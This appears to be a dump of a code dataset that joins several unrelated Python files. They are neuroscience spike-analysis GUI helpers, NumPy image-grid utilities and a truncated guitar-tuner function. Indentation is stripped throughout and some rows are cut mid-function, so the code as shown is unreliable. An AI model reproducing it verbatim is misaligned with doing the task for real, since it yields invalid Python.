# reduces down the fields to account for the manditory direction filtering
r_obj.t_phase = [[dt] * len(x) for x in r_obj.t_phase]
r_obj.phase_lbl = ['Baseline', 'Clockwise', 'Counter-Clockwise']
r_obj.lg_str = [x.replace('Reverse\n', '') for x in r_obj.lg_str[:n_filt]]
r_obj.i_expt, r_obj.ch_id, r_obj.cl_id = r_obj.i_expt[:n_filt], r_obj.ch_id[:n_filt], r_obj.cl_id[:n_filt]
# # loops through each stimuli direction (CW/CCW) and for each filter reducing the stimuli phases
# for i_dir in range(len(rot_filt['t_freq_dir'])):
# for i_filt in range(n_filt):
#
# # for each cell (in each phase) reduce the spikes to fit the shortened stimuli range
# ii = ind_type[i_dir][i_filt]
# for i_cell in range(np.size(r_obj.t_spike[ii], axis=0)):
# for i_trial in range(np.size(r_obj.t_spike[ii], axis=1)):
# for i_phase in range(np.size(r_obj.t_spike[ii], axis=2)):
# # reduces the spikes by the shortened stimuli phase depending on the phase
# if r_obj.t_spike[ii][i_cell, i_trial, i_phase] is not None:
# x = dcopy(r_obj.t_spike[ii][i_cell, i_trial, i_phase])
# if i_phase == 0:
# # case is the baseline phase
# r_obj.t_spike[ii][i_cell, i_trial, i_phase] = x[x > (t_phase - dt)]
# else:
# # case is the stimuli phase
# jj = np.logical_and(x >= t0, x < (t0 + dt))
# r_obj.t_spike[ii][i_cell, i_trial, i_phase] = x[jj]
# returns the rotational analysis object
return r_obj, ind_type
def eval_class_func(funcName, *args):
'''
:param funcName:
:param args:
:return:
'''
return funcName(*args)
def set_box_color(bp, color):
'''
:param bp:
:param color:
:return:
'''
plt.setp(bp['boxes'], color=color)
plt.setp(bp['whiskers'], color=color)
plt.setp(bp['caps'], color=color)
plt.setp(bp['medians'], color=color)
def cond_abb(tt):
'''
:param tt:
:return:
'''
# sets up the abbreviation dictionary
abb_txt = {
'black': 'B',
'uniform': 'U',
'motordrifting': 'MD',
'uniformdrifting': 'UD',
'landmarkleft': 'LL',
'landmarkright': 'LR',
'black40': 'B40',
'black45': 'B45',
'mismatch1': 'MM1',
'mismatch2': 'MM2',
'mismatchvert': 'MMV',
'black_discard': 'BD',
}
# returns the matching abbreviation
return abb_txt[convert_trial_type(tt).lower()]
def convert_trial_type(tt_str):
'''
:param tt_str:
:return:
'''
# sets the trial type key dictionary
tt_key = {
'Black40': ['Black_40', 'Black40deg'],
'Black45': ['Black_45', 'Black45deg'],
'Mismatch1': ['mismatch1', 'Mismatch-o'],
'Mismatch2': ['mismatch2'],
'MismatchVert': ['mismatch-vert', 'mismatch-up', 'Mismatch-vert'],
'Black_Discard': ['Black_discard', 'Black-discard', 'Black1_Discard']
}
# determines if the trial type string is in any of the conversion dictionary fields
for tt in tt_key:
if tt_str in tt_key[tt]:
return tt
# if no matches are made, then return the original strings
return tt_str
def pad_array_with_nans(y, n_row=0, n_col=0):
'''
:param y:
:param n_row:
:param n_col:
:return:
'''
# creates a copy of the array
yy = dcopy(y)
# expands the rows (if required)
if n_row > 0:
yy = np.lib.pad(yy, ((0, n_row), (0, 0)), 'constant', constant_values=np.NaN)
# expands the columns (if required)
if n_col > 0:
yy = np.lib.pad(yy, ((0, 0), (0, n_col)), 'constant', constant_values=np.NaN)
# returns the final array
return yy
def calc_pointwise_diff(x1, x2):
'''
:param X1:
:param X2:
:return:
'''
#
X1, X2 = np.meshgrid(x1, x2)
return np.abs(X1 - X2)
def check_existing_file(hParent, out_file):
'''
:param out_file:
:return:
'''
if os.path.exists(out_file):
# prompts the user if they want to remove the selected item(s)
u_choice = QMessageBox.question(hParent, 'Overwrite Existing File?',
"File already exists. Are you sure you wish to overwrite this file?",
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
# returns if user wants to overwrite this file
return u_choice == QMessageBox.Yes
else:
# file doesn't exist so continue as normal
return True
def setup_sns_plot_dict(**kwargs):
'''
:param kwargs:
:return:
'''
# initialisations
sns_dict = {}
# sets up the swarmplot data dictionary
for key, value in kwargs.items():
sns_dict[key] = value
# returns the plot dictionary
return sns_dict
def create_error_area_patch(ax, x, y_mn, y_err, col, f_alpha=0.2, y_err2=None, l_style='-', edge_color=None):
'''
:param ax:
:param x:
:param y_mn:
:param y_err:
:param col:
:param f_alpha:
:param y_err2:
:return:
'''
# removes the non-NaN values
is_ok = ~np.isnan(y_err)
y_err, x = dcopy(y_err)[is_ok], np.array(dcopy(x))[is_ok]
if edge_color is None:
edge_color = col
#
if y_mn is not None:
y_mn = dcopy(y_mn)[is_ok]
# sets up the error patch vertices
if y_err2 is None:
if y_mn is None:
err_vert = [*zip(x, np.maximum(0, y_err)), *zip(x[::-1], np.maximum(0, y_err[::-1]))]
else:
err_vert = [*zip(x, np.maximum(0, y_mn + y_err)), *zip(x[::-1], np.maximum(0, y_mn[::-1] - y_err[::-1]))]
else:
# removes the non-NaN values
y_err2 = dcopy(y_err2)[is_ok]
if y_mn is None:
err_vert = [*zip(x, np.maximum(0, y_err)), *zip(x[::-1], np.maximum(0, y_err2[::-1]))]
else:
err_vert = [*zip(x, np.maximum(0, y_mn + y_err)), *zip(x[::-1], np.maximum(0, y_mn[::-1] - y_err2[::-1]))]
# creates the polygon object and adds it to the axis
poly = Polygon(err_vert, facecolor=col, alpha=f_alpha, edgecolor=edge_color, linewidth=3, linestyle=l_style)
ax.add_patch(poly)
def create_step_area_patch(ax, x, y_mn, y_err, col, f_alpha=0.2):
'''
:param ax:
:param x:
:param y_mn:
:param y_err:
:param col:
:param f_alpha:
:return:
'''
# determines the new x-axis interpolation points
d_xi = x[1] - x[0]
x_interp = np.arange(x[0] - d_xi / 2, x[-1] + (0.001 + d_xi / 2), d_xi)
# sets the x-locations for each of the steps
ii = np.arange(len(x)).astype(int)
x_step = x_interp[np.vstack((ii, ii+1)).T].flatten()
# sets the lower/upper bound step values
jj = repmat(ii, 2, 1).T
y_lo, y_hi = (y_mn[jj] - y_err[jj]).flatten(), (y_mn[jj] + y_err[jj]).flatten()
# creates the polygon object and adds it to the axis
step_vert = [*zip(x_step, y_lo), *zip(x_step[::-1], y_hi[::-1])]
poly = Polygon(step_vert, facecolor=col, alpha=f_alpha, edgecolor=col, linewidth=4)
ax.add_patch(poly)
def set_sns_colour_palette(type='Default'):
'''
:param type:
:return:
'''
if type == 'Default':
colors = sns.xkcd_palette(["dark slate blue", "dark peach", "dull teal", "purpley grey", "maize", "sea blue",
"dark salmon", "teal", "dusty lavender", "sandy", "turquoise blue", "terracota", "dark seafoam",
"dark lilac", "buff"])
# updates the colour palette
sns.set_palette(colors)
def det_closest_file_match(f_grp, f_new, use_ratio=False):
'''
:param f_grp:
:param f_new:
:return:
'''
#
ind_m = next((i for i in range(len(f_grp)) if f_grp[i] == f_new), None)
if ind_m is None:
# determines the best match and returns the matching file name/score
if use_ratio:
f_score = np.array([fuzz.ratio(x.lower(), f_new.lower()) for x in f_grp])
else:
f_score = np.array([fuzz.partial_ratio(x.lower(), f_new.lower()) for x in f_grp])
# sorts the scores/file names by descending score
i_sort = np.argsort(-f_score)
f_score, f_grp = f_score[i_sort], np.array(f_grp)[i_sort]
# returns the top matching values
return f_grp[0], f_score[0]
else:
# otherwise, return the exact match
return f_grp[ind_m], 100.
def get_cfig_line(cfig_file, fld_name):
'''
:param cfg_file:
:param fld_name:
:return:
'''
return next(c.rstrip('\n').split('|')[1] for c in open(cfig_file) if fld_name in c)
def save_single_file(f_name, data):
'''
:param f_name:
:param data:
:return:
'''
with open(f_name, 'wb') as fw:
p.dump(data, fw)
def save_multi_comp_file(main_obj, out_info, force_update=False):
'''
:param main_obj:
:param out_info:
:param force_update:
:return:
'''
# sets the output file name
out_file = os.path.join(out_info['inputDir'], '{0}.mcomp'.format(out_info['dataName']))
if not force_update:
if not check_existing_file(main_obj, out_file):
# if the file does exists and the user doesn't want to overwrite then exit
return
# starts the worker thread
iw = main_obj.det_avail_thread_worker()
main_obj.worker[iw].set_worker_func_type('save_multi_comp_file', thread_job_para=[main_obj.data, out_info])
main_obj.worker[iw].start()
def save_single_comp_file(main_obj, out_info, force_update=False):
'''
:return:
'''
# sets the output file name
out_file = os.path.join(out_info['inputDir'], '{0}.ccomp'.format(out_info['dataName']))
if not force_update:
if not check_existing_file(main_obj, out_file):
# if the file does exists and the user doesn't want to overwrite then exit
return
# retrieves the index of the data field corresponding to the current experiment
i_comp = det_comp_dataset_index(main_obj.data.comp.data, out_info['exptName'])
# creates the multi-experiment data file based on the type
data_out = {'data': [[] for _ in range(2)], 'c_data': main_obj.data.comp.data[i_comp],
'ex_data': None, 'gen_filt': main_obj.data.exc_gen_filt}
data_out['data'][0], data_out['data'][1] = get_comp_datasets(main_obj.data, c_data=data_out['c_data'], is_full=True)
# outputs the external data (if it exists)
if hasattr(main_obj.data, 'externd'):
if hasattr(main_obj.data.externd, 'free_data'):
data_out['ex_data'] = main_obj.data.externd.free_data
# outputs the data to file
with open(out_file, 'wb') as fw:
p.dump(data_out, fw)
def save_multi_data_file(main_obj, out_info, is_multi=True, force_update=False):
'''
:return:
'''
# initialisations
f_extn = 'mdata' if is_multi else 'mcomp'
# determines if the file exists
out_file = os.path.join(out_info['inputDir'], '{0}.{1}'.format(out_info['dataName'], f_extn))
if not force_update:
if not check_existing_file(main_obj, out_file):
# if the file does exists and the user doesn't want to overwrite then exit
return
# starts the worker thread
iw = main_obj.det_avail_thread_worker()
main_obj.worker[iw].set_worker_func_type('save_multi_expt_file', thread_job_para=[main_obj.data, out_info])
main_obj.worker[iw].start()
def det_comp_dataset_index(c_data, exp_name, is_fix=True):
'''
:param c_data:
:param exp_name:
:return:
'''
# removes any forward slashes (if present)
if '/' in exp_name:
exp_name = exp_name.split('/')[0]
f_name = [cd.fix_name for cd in c_data] if is_fix else [cd.free_name for cd in c_data]
return det_likely_filename_match(f_name, exp_name)
def det_likely_filename_match(f_name, exp_name):
'''
:param f_name:
:param exp_name:
:return:
'''
# sets the search name
exp_name_search = exp_name[0] if isinstance(exp_name, list) else exp_name
# determines the comparison dataset with the matching freely moving experiment file name
i_expt_nw = next((i for i, x in enumerate(f_name) if x.lower() == exp_name_search.lower()), None)
if i_expt_nw is None:
# if there isn't an exact match, then determine the
m_score_fuzz = np.array([fuzz.partial_ratio(x, exp_name_search) for x in f_name])
i_match_fuzz = np.where(m_score_fuzz > 90)[0]
#
if len(i_match_fuzz) == 0:
# case is there are no matches
return None
elif len(i_match_fuzz) > 1:
# case is there is more than one match
m_score_fuzz_2 = np.array([fuzz.ratio(x, exp_name_search) for x in f_name])
i_expt_nw = np.argmax(np.multiply(m_score_fuzz, m_score_fuzz_2))
else:
# case is there is only one match
i_expt_nw = i_match_fuzz[0]
# returns the index of the matching file
return i_expt_nw
def get_comp_datasets(data, c_data=None, ind=None, is_full=False):
'''
:return:
'''
# sets the cluster type
if use_raw_clust(data):
c = data._cluster
else:
c = data._cluster if is_full else data.cluster
# retrieves the fixed/free datasets based on type
if ind is None:
return c[get_expt_index(c_data.fix_name, c)], c[get_expt_index(c_data.free_name, c)]
else:
return c[ind[0]], c[ind[1]]
def get_comb_file_names(str_1, str_2):
'''
:param str_1:
:param str_2:
:return:
'''
# initialisations
N = min(len(str_1), len(str_2))
_str_1, _str_2 = str_1.lower(), str_2.lower()
# determines the mutual components of each string and combines them into a single string
i_match = next((i for i in range(N) if _str_1[i] != _str_2[i]), N + 1) - 1
return '{0}/{1}'.format(str_1, str_2[i_match:])
def use_raw_clust(data):
'''
:param data:
:return:
'''
return (data.cluster is None) or (len(data.cluster) != len(data._cluster))
def get_global_expt_index(data, c_data):
'''
:param data:
:param c_data:
:return:
'''
return [extract_file_name(c['expFile']) for c in data._cluster].index(c_data.fix_name)
def has_free_ctype(data):
'''
:param data:
:return:
'''
# determines if the freely moving data field has been set into the external data field of the main data object
if hasattr(data, 'externd'):
if hasattr(data.externd, 'free_data'):
# if so, determine if the cell type information has been set for at least one experiment
return np.any([len(x) > 0 for x in data.externd.free_data.cell_type])
else:
# otherwise, return a false flag value
return False
else:
# if no external data field, then return a false flag value
return False
def det_matching_fix_free_cells(data, exp_name=None, cl_ind=None, apply_filter=False, r_obj=None):
'''
:param data:
:return:
'''
import analysis_guis.calc_functions as cfcn
from analysis_guis.dialogs.rotation_filter import RotationFilteredData
# sets the experiment file names
if exp_name is None:
exp_name = data.externd.free_data.exp_name
elif not isinstance(exp_name, list):
exp_name = list(exp_name)
# initialisations
free_file, free_data = [x.free_name for x in data.comp.data], data.externd.free_data
i_file_free = [free_data.exp_name.index(ex_name) for ex_name in exp_name]
# retrieves the cluster indices (if not provided)
if cl_ind is None:
r_filt = init_rotation_filter_data(False)
r_filt['t_type'] += ['Uniform']
r_obj0 = RotationFilteredData(data, r_filt, None, None, True, 'Whole Experiment', False, use_raw=True)
cl_ind = r_obj0.clust_ind[0]
# memory allocation
n_file = len(exp_name)
is_ok = np.ones(n_file, dtype=bool)
i_expt = -np.ones(n_file, dtype=int)
f2f_map = np.empty(n_file, dtype=object)
for i_file, ex_name in enumerate(exp_name):
# determines if there is a match between the freely moving experiment file and that stored within the
# freely moving data field
if det_likely_filename_match(free_data.exp_name, ex_name) is None:
# if not, then flag the file as being invalid and continue
is_ok[i_file] = False
continue
else:
# otherwise, determine if there is a match within the comparison dataset freely moving data files
i_expt_nw = det_likely_filename_match(free_file, ex_name)
if i_expt_nw is None:
# if not, then flag the file as being invalid and continue
is_ok[i_file] = False
continue
# retrieves the fixed/free datasets
i_expt[i_file] = i_expt_nw
c_data = data.comp.data[i_expt_nw]
data_fix, data_free = get_comp_datasets(data, c_data=c_data, is_full=True)
# sets the match array (removes non-inclusion cells and non-accepted matched cells)
cl_ind_nw = cl_ind[i_expt_nw]
i_match = c_data.i_match[cl_ind_nw]
i_match[~c_data.is_accept[cl_ind_nw]] = -1
# removes any cells that are excluded by the general filter
if apply_filter:
cl_inc_fix = cfcn.get_inclusion_filt_indices(data_fix, data.exc_gen_filt)
i_match[np.logical_not(cl_inc_fix)] = -1
# if there is a secondary rotation filter object, then remove any non-included indices
if r_obj is not None:
b_arr = set_binary_groups(len(i_match), r_obj.clust_ind[0][i_expt_nw])
i_match[~b_arr] = -1
# determines the overlapping cell indices between the free dataset and those from the cdata file
_, i_cell_free_f, i_cell_free = \
np.intersect1d(dcopy(free_data.cell_id[i_file_free[i_file]]), dcopy(data_free['clustID']),
assume_unique=True, return_indices=True)
# determines the fixed-to-free mapping index arrays
_, i_cell_fix, i_free_match = np.intersect1d(i_match, i_cell_free, return_indices=True)
f2f_map[i_file] = -np.ones((len(cl_ind_nw),2), dtype=int)
f2f_map[i_file][i_cell_fix, 0] = i_cell_free[i_free_match]
f2f_map[i_file][i_cell_fix, 1] = i_cell_free_f[i_free_match]
# returns the experiment index/fixed-to-free mapping indices
return i_expt, f2f_map
def det_reverse_indices(i_cell_b, ind_gff):
'''
:param i_cell_b:
:param ind_gff:
:return:
'''
_, _, ind_rev = np.intersect1d(i_cell_b, ind_gff, return_indices=True)
return ind_rev
def reset_table_pos(fig, ax_t, t_props):
'''
:param fig:
:param ax:
:param t_props:
:return:
'''
# no need to reset positions if only one table
n_table = len(t_props)
if n_table == 1:
return
# initialisations
f_rend = fig.get_renderer()
ax_pos = ax_t.get_tightbbox(f_rend).bounds
ax_hght = ax_pos[1] + ax_pos[3]
#
t_pos = [tp[0].get_tightbbox(f_rend).bounds for tp in t_props]
t_pos_bb = [tp[0]._bbox for tp in t_props]
#
for i_table in range(1, n_table):
#
p_hght = 1 - i_table / n_table
y_nw = (p_hght * ax_hght) - t_pos[i_table][3]
#
t_props[i_table][0]._bbox[1] = y_nw / t_props[i_table][2]
t_props[i_table][0]._bbox[0] = t_pos_bb[0][0] + (t_pos_bb[0][2] - t_pos_bb[i_table][2]) / 2
def get_table_font_size(n_grp):
'''
:param n_grp:
:return:
'''
if n_grp <= 2:
return create_font_obj(size=10)
elif n_grp <= 4:
return create_font_obj(size=8)
else:
return create_font_obj(size=6)
def get_cluster_id_flag(cl_id, i_expt=None):
if i_expt is None:
# case is the experiment index is not provided
return [(i * 10000) + np.array(y) for i, y in enumerate(cl_id)]
else:
# case is the experiment index is provided
return [(i * 10000) + y for i, y in zip(i_expt, cl_id)]
def get_array_lengths(Y, fld_key=None):
'''
:param Y:
:param fld_key:
:return:
'''
if fld_key is None:
return np.array([len(x) for x in Y])
else:
return np.array([eval('x["{0}"]'.format(fld_key)) for x in Y])
def get_global_index_arr(r_obj, return_all=True, i_expt_int=None):
'''
:param r_obj:
:return:
'''
def setup_global_index_arr(nC, i_expt_int, i_expt0, return_all):
'''
:param nC:
:param i_expt0:
:return:
'''
ii = np.append(0, np.cumsum(nC))
if return_all:
return [np.arange(ii[i], ii[i + 1]) if (i_expt0[i] in i_expt_int)
and (ii[i + 1] - ii[i]) > 0 else [] for i in range(len(ii) - 1)]
else:
return [np.arange(ii[i], ii[i + 1]) for i in range(len(ii) - 1)
if (i_expt0[i] in i_expt_int) and (ii[i + 1] - ii[i]) > 0]
# determines the indices of the experiments that are common to all trial types
if i_expt_int is None:
i_expt_int = set(r_obj.i_expt0[0])
for i_ex in r_obj.i_expt0[1:]:
i_expt_int = i_expt_int.intersection(set(i_ex))
# retrieves the global indices of the cells wrt to the filtered spiking frequency values
return [setup_global_index_arr(get_array_lengths(cl_id), i_expt_int, i_ex, return_all)
for cl_id, i_ex in zip(r_obj.clust_ind, r_obj.i_expt0)], np.array(list(i_expt_int))
else:
# retrieves the global indices of the cells wrt to the filtered spiking frequency values
cl_id = [[x for i, x in zip(i_ex0, cl_id) if i in i_expt_int] for i_ex0, cl_id in
zip(r_obj.i_expt0, r_obj.clust_ind)]
return [setup_global_index_arr(get_array_lengths(_cl_id), i_expt_int, i_expt_int, return_all)
for _cl_id in cl_id]
def reset_integer_tick(ax, ax_type):
'''
:param ax:
:param ax_type:
:return:
'''
if ax_type == 'x':
get_tick_fcn, set_tick_fcn, set_lbl_fcn = ax.get_xticks, ax.set_xticks, ax.set_xticklabels
else:
get_tick_fcn, set_tick_fcn, set_lbl_fcn = ax.get_yticks, ax.set_yticks, ax.set_yticklabels
# retrieves the tick values and determines if they are integers
t_vals = get_tick_fcn()
is_ok = t_vals % 1 == 0
# if there are any non-integer values then remove them
if np.any(~is_ok):
set_tick_fcn(t_vals[is_ok])
set_lbl_fcn([Annotation('{:d}'.format(int(y)),[0, y]) for y in t_vals[is_ok]])
def get_all_filter_indices(data, rot_filt):
'''
:param data:
:param rot_filt:
:return:
'''
# module import
from analysis_guis.dialogs.rotation_filter import RotationFilteredData
# retrieves the data clusters for each of the valid rotation experiments
is_rot_expt = det_valid_rotation_expt(data)
d_clust = [x for x, y in zip(data._cluster, is_rot_expt) if y]
wfm_para = [x['rotInfo']['wfm_para']['UniformDrifting'] for x in
d_clust if 'UniformDrifting' in x['rotInfo']['wfm_para']]
# adds any non-empty filter objects onto the rotation filter object
for gf in data.exc_gen_filt:
if len(data.exc_gen_filt[gf]):
# retrieves the field values
if gf in ['cell_type']:
# case is the freely moving data types
fld_vals = get_unique_group_types(d_clust, gf, c_type=data.externd.free_data.cell_type)
elif gf in ['temp_freq', 'temp_freq_dir', 'temp_cycle']:
# case is the uniform drifting data types
fld_vals = get_unique_group_types(d_clust, gf, wfm_para=wfm_para)
else:
# case is the other rotation data types
fld_vals = get_unique_group_types(d_clust, gf)
# retrieves the fields values to be added
add_fld = list(set(fld_vals) - set(data.exc_gen_filt[gf]))
if 'All' in rot_filt[gf]:
rot_filt[gf] = add_fld
else:
rot_filt[gf] = list(np.union1d(add_fld, rot_filt[gf]))
# retrieves the rotation filter data class object
r_obj = RotationFilteredData(data, rot_filt, None, None, True, 'Whole Experiment', False,
rmv_empty=0, use_raw=True)
# returns the cluster indices
return r_obj.clust_ind
def get_unique_group_types(d_clust, f_type, wfm_para=None, c_type=None):
'''
:param d_clust:
:param f_type:
:return:
'''
# retrieves the field values based on the type and inputs
if wfm_para is not None:
# case is the uniform-drifting values
if f_type == 'temp_freq':
return [str(x) for x in get_field(wfm_para, 'tFreq')]
elif f_type == 'temp_freq_dir':
return [str(x) for x in get_field(wfm_para, 'yDir').astype(int)]
elif f_type == 'temp_cycle':
return [str(x) for x in get_field(wfm_para, 'tCycle').astype(int)]
elif c_type is not None:
if f_type in ['c_type', 'free_ctype']:
c_type0 = pd.concat([x[0] for x in c_type if len(x)], axis=0)
c_none = ['No Type'] if any(np.sum(c_type0, axis=1)==0) else []
return [ct for ct, ct_any in zip(c_type0.columns, np.any(c_type0, axis=0)) if ct_any] + c_none
else:
if f_type == 'sig_type':
return ['Narrow Spikes', 'Wide Spikes']
elif f_type == 'match_type':
return ['Matched Clusters', 'Unmatched Clusters']
elif f_type in ['t_type', 'trial_type']:
return flat_list([list(x['rotInfo']['trial_type']) for x in d_clust])
elif f_type in ['region_type', 'region_name']:
return list(np.unique(flat_list([list(np.unique(x['chRegion'])) for x in d_clust])))
elif f_type == 'record_layer':
return list(np.unique(flat_list([list(np.unique(x['chLayer'])) for x in d_clust])))
elif f_type == 'record_coord':
return list(np.unique([x['expInfo']['record_coord'] for x in d_clust]))
elif f_type in ['lesion_type', 'lesion']:
return list(np.unique([x['expInfo']['lesion'] for x in d_clust]))
elif f_type == 'record_state':
return list(np.unique([x['expInfo']['record_state'] for x in d_clust]))
def get_free_inclusion_indices(data, i_bin, rmv_nmatch=False):
'''
:param i_bin:
:param rmv_nmatch:
:return:
'''
# function import
from analysis_guis.calc_functions import get_inclusion_filt_indices
# initialisations
f_data, g_filt = data.externd.free_data, data.exc_gen_filt
cell_type_all, ahv_score_all = f_data.cell_type, f_data.ahv_score
# retrieves the indices of the free experiments that match the external data files
c_free = [c for c in data._cluster if c['rotInfo'] is None]
exp_free = [extract_file_name(x['expFile']) for x in c_free]
i_expt_free = [exp_free.index(det_closest_file_match(exp_free, f_name)[0]) for f_name in f_data.exp_name]
# retrieves the inclusion cell boolean flags (matched with the external data files)
cl_inc_free = [get_inclusion_filt_indices(c_free[i_ex], g_filt) for i_ex in i_expt_free]
# maps the freely moving experiments to the external data files
i_map = [np.intersect1d(id, c['clustID'], return_indices=True)[1:]
for id, c in zip(f_data.cell_id, np.array(c_free)[i_expt_free])]
# matches up the inclusion flags for the external data files to the matching free data files
cl_inc_extn = np.empty(len(c_free), dtype=object)
n_ff = [np.size(c_type[i_bin], axis=0) for c_type in cell_type_all]
for i in range(len(c_free)):
cl_inc_extn[i] = np.zeros(n_ff[i], dtype=bool)
cl_inc_extn[i][i_map[i][0]] = cl_inc_free[i][i_map[i][1]]
# resets the inclusion cell boolean flags (if required)
if rmv_nmatch:
# determines the mapping between the free/external data file free cells
_, f2f_map = det_matching_fix_free_cells(data, exp_name=f_data.exp_name)
# sets the inclusion cell boolean flags for the unmatched cells to false
for i in range(len(cl_inc_extn)):
cl_inc_extn[i][~set_binary_groups(n_ff[i], f2f_map[i][f2f_map[i][:, 1] >= 0, 1])] = False
# returns the inclusion index array
return cl_inc_extn
def get_cell_index_and_id(h_main, cell_id, exp_name, use_raw=False, arr_out=True, plot_all=False):
'''
:param cell_id:
:param exp_name:
:return:
'''
# retrieves the experiment index and cluster ID#'s
i_expt = h_main.fcn_data.get_exp_name_list('Experiments').index(exp_name)
cl_id = h_main.data._cluster[i_expt]['clustID'] if use_raw else h_main.data.cluster[i_expt]['clustID']
# converts the cell ID integers to a list (if not already so)
if plot_all:
return cl_id, list(np.arange(len(cl_id)).astype(int))
# converts the cell ID integers to a list (if not already so)
if not isinstance(cell_id, list):
cell_id = [cell_id]
# determines the cell ID# and index within the experiment for each cell ID#
c_id, i_cell = [], []
for _cid in cell_id:
# retrieves the cell ID# from the current cell
c_id_nw = int(_cid[_cid.index('#') + 1:])
c_id.append(c_id_nw)
# determines the index of the cell within the experiment
i_cell.append(cl_id.index(c_id_nw))
# returns the cell ID/index arrays
if arr_out:
# case is outputting the values as an array
return c_id, i_cell
else:
# case is outputting individual values
return c_id[0], i_cell[0]
def get_fix_free_indices(data, data_fix, data_free, cell_id, use_1D=False):
'''
:return:
'''
if (len(cell_id) == 0) or (cell_id[0] == 'No Valid Fixed/Free Cells'):
# if there are no valid cells, or no cells were selected, then output an error to screen
e_str = 'Either there are no valid cells for this experiment or no cells have been selected.\n' \
'Re-run the function with either another experiment or with cells selected.'
show_error(e_str, 'Invalid Fixed/Free Cell Selection')
# if there are no cells selected, then return None
return None, None
# determines the number of cells that are to be analysed
n_cell = len(cell_id)
if n_cell > n_plot_max:
# if the number of cell is greater than max, then set the error string
e_str = 'The number of subplots ({0}) is greater than the maximum ({1}).\nRemove the "Plot All Clusters" ' \
'checkbox option before re-running this function.'.format(n_cell, n_plot_max)
# output an error message to screen and return Nones
show_error(e_str, 'Invalid Cell Selection')
return None, None
else:
# memory allocation
c_id, i_cell = -np.ones((n_cell, 2), dtype=int), -np.ones((n_cell, 2), dtype=int)
for ic, cc in enumerate(cell_id):
# splits the cell ID into fixed/free cell IDs
i_ff = re.findall('[0-9]+', cc)
# determines the cluster index/cell index for each grouping
for j in range(len(i_ff)):
c_id[ic, j] = int(i_ff[j])
i_cell[ic, j] = data_fix['clustID'].index(c_id[ic, j]) if j == 0 else \
data_free['clustID'].index(c_id[ic, j])
# returns the arrays
if use_1D:
# returns the 1D array if required
return c_id[0, :], i_cell[0, :]
else:
# otherwise, return the full arrays
return c_id, i_cell
def get_all_fix_free_indices(data, c_data, data_fix, data_free, match_reqd=False, is_old=False):
'''
:param data:
:param c_data:
:param data_fix:
:param data_free:
:return:
'''
# function import
from analysis_guis.calc_functions import get_inclusion_filt_indices
# initialisations
e_str = None
# retrieves the inclusion filter indices and the fix/free cell ID#'s
cl_ind = get_inclusion_filt_indices(data_fix, data.exc_gen_filt)
cl_fix, cl_free = np.array(data_fix['clustID']), np.array(data_free['clustID'])
# sets the match indices (depending on the calculation method)
i_match = c_data.i_match_old if is_old else c_data.i_match
if match_reqd:
# if a match is required, then remove all non-matches
i_match[~cl_ind] = -1
ii = i_match >= 0
else:
# otherwise, use
ii = cl_ind
if np.any(ii):
# determines the number of cells that are to be analysed
if np.sum(ii) > n_plot_max:
# if the number of cell is greater than max, then set the error string
e_str = 'The number of subplots ({0}) is greater than the maximum ({1}).\nRemove the "Plot All Clusters" ' \
'checkbox option before re-running this function.'.format(np.sum(ii), n_plot_max)
else:
# memory allocation
n_cell = len(ii)
c_id, i_cell = -np.ones((n_cell, 2), dtype=int), -np.ones((n_cell, 2), dtype=int)
# sets the cell ID#'s and indices
for i_m in np.where(ii)[0]:
# sets the fixed cell ID#/index
c_id[i_m, 0], i_cell[i_m, 0] = cl_fix[i_m], i_m
if i_match[i_m] >= 0:
# if there is a match, then set the free cell ID#/index
c_id[i_m, 1], i_cell[i_m, 1] = cl_free[i_match[i_m]], i_match[i_m]
# removes the
c_id, i_cell = c_id[ii, :], i_cell[ii, :]
else:
# if there are no
e_str = 'There are no valid fixed/free cell matches! Either select another function or reset ' \
'the filter options.'
if e_str is None:
# if there was no errors, then return the arrays
return c_id, i_cell
else:
# if there was an error, then output the error message to screen and return Nones
show_error(e_str, 'Invalid Cell Selection')
return None, None
def is_final_row(i_row, i_col, n_row, n_col, n_plot):
'''
:param i_row:
:param i_col:
:param n_row:
:param n_col:
:param n_plot:
:return:
'''
return (i_row + 1) == n_row - int((i_col + 1) > (n_plot % n_col))
def get_scatterplot_colour(c, x):
'''
:param c:
:param x:
:return:
'''
# sets the scatterplot colours (based on type)
if isinstance(c, str):
# colour is a string, so return the values
return c
else:
# colour is an array, so repeat for as many elements being plotted
return repmat(c, len(x), 1) |
983,719 | 731aabab1559e0ef2c9cfbb8c46adf707c643287 | import math
import random
import numpy as np
def crop_region(full_image, bbox):
x, y, w, h = bbox
return full_image[y:y+h, x:x+w]
def distance(rgb1, rgb2):
"""
Return the Euclidean distance between the two RGB colors
"""
diffs = np.array(rgb1) - np.array(rgb2)
return math.sqrt(np.sum(diffs**2))
def _create_grid(images, indices, n_rows=4, n_cols=4):
n, h, w, *rest = images.shape
c = rest[0] if rest else 1
# Grayscale and RGB need differing grid dimensions
if c > 1:
display_grid = np.zeros((n_rows * h, n_cols * w, c))
else:
display_grid = np.zeros((n_rows * h, n_cols * w))
# Uncomment the line below if you want to visualize
# digit data with smooth contours.
# display_grid = display_grid.astype(np.uint8)
row_col_pairs = [(row, col) for row in range(n_rows) for col in range(n_cols)]
for idx, (row, col) in zip(indices, row_col_pairs):
row_start = row * h
row_end = (row + 1) * h
col_start = col * w
col_end = (col + 1) * w
if c > 1:
display_grid[row_start:row_end, col_start:col_end, :] = images[idx]
else:
display_grid[row_start:row_end, col_start:col_end] = images[idx].reshape((h,w))
return display_grid
def create_grid(images, n_rows=4, n_cols=4):
"""
Creates a n_rows x n_cols grid of the images corresponding
to the first K indices (K = n_rows * n_cols). If K > # of images,
simply display all the images. This grid itself
is a large NumPy array.
"""
k = min(n_rows * n_cols, len(images))
indices = [i for i in range(k)]
return _create_grid(images, indices, n_rows, n_cols)
def create_rand_grid(images, n_rows=4, n_cols=4):
"""
Creates a n_rows x n_cols grid of the images corresponding
to K randomly chosen indices (K = n_rows * n_cols). If K > # of images,
simply display all the images. This grid itself
is a large NumPy array.
"""
k = min(n_rows * n_cols, len(images))
indices = random.sample(range(len(images)), k)
return _create_grid(images, indices, n_rows, n_cols) |
983,720 | 81ba745c969ba4db679b2a395e3ffa00468fd798 | def get_result():
from guitar_tune import guitar_tuning
global E1,listbox,Tk
freq=0
correct_entry = False
if E1.get()=="E_low":
freq =82.41
correct_entry = True
elif E1.get()=="A":
freq=110.00
correct_entry = True
elif E1.get()=="D":
freq=146.83
correct_entry = True
elif E1.get()=="G":
freq=196.00
correct_entry = True
elif E1.get()=="B":
freq=246.94
correct_entry = True
elif E1.get()=="E_high":
freq=329.63
